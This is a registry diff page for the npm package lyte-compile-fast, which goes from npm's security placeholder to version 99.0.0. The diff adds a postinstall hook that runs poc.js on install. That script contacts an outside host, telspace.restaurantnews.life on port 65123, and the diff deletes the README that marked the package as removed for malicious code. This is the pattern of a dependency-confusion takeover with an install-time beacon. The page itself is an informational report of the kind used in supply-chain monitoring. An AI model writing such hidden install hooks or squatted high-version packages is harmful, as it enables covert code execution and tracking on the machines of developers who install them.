lyte-compile-fast 0.0.1-security → 99.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of lyte-compile-fast might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/package.json +9 -3
  2. package/poc.js +20 -0
  3. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "lyte-compile-fast",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "99.0.0",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "postinstall": "node poc.js"
7
+ },
8
+ "keywords": [],
9
+ "author": "",
10
+ "license": "ISC",
11
+ "description": ""
6
12
  }
package/poc.js ADDED
@@ -0,0 +1,20 @@
1
+ const http = require('http');
2
+
3
+ const options = {
4
+ hostname: 'telspace.restaurantnews.life', // Replace with your analyst server hostname
5
+ port: 65123,
6
+ path: '/poc-hit', // Adjust path as needed for your analyst API/server
7
+ method: 'GET'
8
+ };
9
+
10
+ const req = http.request(options, (res) => {
11
+ console.log('PoC: Sent proof-of-concept hit to analyst server.');
12
+ res.on('data', (d) => {});
13
+ });
14
+
15
+ req.on('error', (e) => {
16
+ console.error('PoC: Error sending to analyst server:', e.message);
17
+ });
18
+
19
+ req.end();
20
+
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=lyte-compile-fast for more information.